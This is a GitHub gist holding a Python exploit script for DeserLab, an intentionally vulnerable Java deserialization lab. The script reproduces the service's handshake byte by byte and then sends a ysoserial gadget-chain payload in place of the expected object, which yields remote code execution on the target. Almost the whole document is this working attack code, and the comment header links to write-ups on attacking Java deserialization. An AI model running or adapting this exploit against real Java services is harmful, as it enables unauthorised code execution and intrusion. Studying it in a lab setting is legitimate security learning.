Skip to content

Instantly share code, notes, and snippets.

@ChillSpike-zz

ChillSpike-zz/deserlab_exploit.py

Forked from DiabloHorn/deserlab_exploit.py
Created April 3, 2019 06:03
Show Gist options
  • Save ChillSpike-zz/5c86265d0205ca7bc96b4dc66aa8678a to your computer and use it in GitHub Desktop.
Save ChillSpike-zz/5c86265d0205ca7bc96b4dc66aa8678a to your computer and use it in GitHub Desktop.
Download ZIP
Exploit for the DeserLab vulnerable implementation
Raw
deserlab_exploit.py
#!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
References
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
https://www.youtube.com/watch?v=VviY3O-euVQ
http://wouter.coekaerts.be/2015/annotationinvocationhandler
http://www.baeldung.com/java-dynamic-proxies
https://stackoverflow.com/questions/37068982/how-to-execute-shell-command-with-parameters-in-groovy
https://www.sourceclear.com/registry/security/remote-code-execution-through-object-deserialization/java/sid-1710/technical
"""
import sys
import socket
import argparse
import logging
import struct
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
class deser:
def __init__(self,tip,tport):
self.targetip = tip
self.targetport = int(tport)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connect(self):
self.s.connect((self.targetip, self.targetport))
def javaserial(self):
blob = '\xac\xed\x00\x05'
self.s.sendall(blob)
logging.debug("server javaserial resp: %s" % self.s.recv(4).encode('hex'))
def protohello(self):
header = self.s.recv(2)
datalength = int(struct.unpack('B',header[1])[0])
logging.debug("server proto hello %s" % self.s.recv(datalength).encode('hex'))
blob = '\x77\x04'
blob2 = '\xf0\x00\xba\xaa'
self.s.sendall(blob)
self.s.sendall(blob2)
def protoversion(self):
header = self.s.recv(2)
datalength = int(struct.unpack('B',header[1])[0])
logging.debug("server version %s" % self.s.recv(datalength).encode('hex'))
blob = '\x77\x02'
blob2 = '\x01\x01'
self.s.sendall(blob)
self.s.sendall(blob2)
def clientname(self):
blob = '\x77\x09' #depends on username + type length
blob2 = '\x00\x07\x74\x65\x73\x74\x69\x6e\x67'
self.s.sendall(blob)
self.s.sendall(blob2)
def exploit(self, payload_file):
"""
Normally this is where the HashRequest object is send
instead we send a ysoserial payload, skipping the first 4 bytes
"""
payload = ''
with open(payload_file, 'rb') as content_file:
payload = content_file.read()
self.s.sendall(payload[4:])
logging.debug('after exploit: %s' % self.s.recv(1024))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit for DeserLab',epilog='https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/')
parser.add_argument('targetip',help='target ip to exploit')
parser.add_argument('targetport',help='target port to exploit')
parser.add_argument('payloadfile',help='file with the ysoserial payload')
myargs = parser.parse_args()
logging.debug("target %s" % myargs.targetip)
logging.debug("port %s" % myargs.targetport)
mydeser = deser(myargs.targetip, myargs.targetport)
logging.info("Connecting")
mydeser.connect()
logging.info("java serialization handshake")
mydeser.javaserial()
logging.info("protocol specific handshake")
mydeser.protohello()
logging.info("protocol specific version handshake")
mydeser.protoversion()
logging.info("sending name of connected client")
mydeser.clientname()
logging.info("exploiting")
mydeser.exploit(myargs.payloadfile)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment